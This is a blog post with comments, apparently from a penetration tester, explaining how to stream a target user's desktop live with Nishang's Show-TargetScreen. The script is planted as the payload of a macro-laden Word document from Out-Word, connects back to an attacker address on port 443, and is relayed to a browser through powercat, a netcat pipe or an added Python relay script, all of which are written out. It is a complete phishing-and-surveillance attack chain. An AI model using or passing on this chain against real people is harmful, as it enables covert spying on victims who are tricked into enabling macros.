Show-TargetScreen is available in the Gather category of Nishang. The current source code looks like this:
Now, to use it in reverse-connect mode without writing a dedicated listener/server, I used powercat to run a local relay: Show-TargetScreen connects back to the relay, and Firefox is pointed at the relay's local port. So, start a powercat listener and relay it to any local port. In the command below, Show-TargetScreen will connect to port 443 and Firefox will connect to port 9000:
Note that on a *nix machine, netcat could be used as well.
Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a client-side attack. Let's use it with Out-Word from Nishang. Since, like other Nishang scripts, Show-TargetScreen.ps1 only loads a function of the same name, the argument "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443" (192.168.1.6 being the machine running the powercat relay) must be passed along with the script so that the function is actually invoked, and this is used as the payload for Out-Word.
Now, the generated doc file is to be sent to a target. As soon as the target user opens the Word file and clicks Enable Content so that the macro runs, we get a connect back on the powercat listener, which relays it to the configured local port (TCP 9000 in this example).
Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop.
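To make clear what the relay actually does (and why it is needed, which is also asked in the comments further down), here is an added example in Python; it is not code from Nishang or powercat. It does the same job as the powercat command on this page and the netcat pipe in the comments: bind two listeners, wait for the Show-TargetScreen connect-back on one port and for the browser on the other, and copy the bytes from the first connection into the second. The port numbers (443 and 9000) follow the page; the listener/function names are my own, and the MJPEG-style header used to exercise it is constructed sample data.

```python
"""Minimal TCP relay standing in for the powercat command on the page.

Added example, not code from Nishang or powercat. It reproduces what the
powercat relay (and the nc pipe in the comments) do: wait for the
Show-TargetScreen connect-back on one port, let the browser connect to a
second, local-only port, and copy the bytes from the connect-back into the
browser connection. Like the nc pipe it is one-directional; the browser's
HTTP request is never forwarded, which is enough for a stream that only
flows from the target to the viewer.
"""
import socket
import threading


def listen_on(port, host="127.0.0.1"):
    """Return a listening socket bound to host:port (port 0 = any free port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def pump(src, dst, bufsize=65536):
    """Copy bytes src -> dst until src closes. Returns the byte count."""
    total = 0
    while True:
        chunk = src.recv(bufsize)
        if not chunk:
            return total
        dst.sendall(chunk)
        total += len(chunk)


def relay_once(payload_srv, browser_srv):
    """Accept one client on each listener, in either order, then relay.

    Both accepts run in parallel, so it does not matter whether the target
    connects back before or after Firefox is pointed at the local port.
    Returns the number of bytes relayed to the browser.
    """
    conns = {}

    def grab(name, srv):
        conns[name], _ = srv.accept()

    waiters = [threading.Thread(target=grab, args=(n, s))
               for n, s in (("payload", payload_srv), ("browser", browser_srv))]
    for t in waiters:
        t.start()
    for t in waiters:
        t.join()
    payload, browser = conns["payload"], conns["browser"]
    try:
        return pump(payload, browser)
    finally:
        # Closing the browser side ends the stream in the viewer once the
        # payload disconnects; the listeners stay open for the next round.
        browser.close()
        payload.close()


if __name__ == "__main__":
    # Same ports as the page: connect-back on 443 (needs root on *nix),
    # browser on 9000, local only. Loop like powercat -rep so repeated
    # connect-backs are served without restarting the relay.
    payload_listener = listen_on(443, host="0.0.0.0")
    browser_listener = listen_on(9000)
    while True:
        n = relay_once(payload_listener, browser_listener)
        print(f"relayed {n} bytes; waiting for the next connect-back")
```

Save it as, say, relay.py (the name is arbitrary), run it on the machine whose address is passed as -IPAddress, and point Firefox to http://127.0.0.1:9000 exactly as with powercat. If binding 443 is not possible, change both the listener port here and the -Port argument given to Show-TargetScreen.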
Awesome, isn't it? I recently tried this in a couple of pen tests and was quite satisfied with the results.
A couple of things I would like to improve in future:
- Proxy support
- HTTPS Connection.
Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome.
Please explain this part: "As soon as a target user opens up the Word file ...". You probably meant "As soon as a target user opens up the Word file *and* then clicks on Enable Content in order to run the macro ...".
Thanks
You are right. The target user must Enable Content. I assumed that part when I wrote "As soon as a target user opens up the Word file". Thanks.
I guess that's a critical assumption, but many people will eventually click Enable.
I would be interested to see how often this works.
Hi, I'm having trouble understanding why the port relay is necessary. Is this something internal to MJPEG? Sorry if the question is noobish; I'm a student trying to learn more about penetration testing.
Thanks
Hi,
The relay is necessary because, AFAIK, Firefox is unable to listen for connections. The local relay allows us to listen for a connect back, and then Firefox can be used to connect to a local port. This eliminates the need to write a listener/server for the connect back.
Oh, that makes sense. Thanks for the reply, really helped clarify my understanding.
Can this be extended to enable remote control of the machine?
Hi,
do I have to use powercat, or can I use netcat?
If it's possible, can you show how to change it from powercat to netcat?
powercat -l -v -p 443 -r tcp:9000 -rep -t 1000
netcat?
Of course you can use netcat, this should work:
nc -nlvp 443 | nc -nlvp 9000
THX :) /VASCO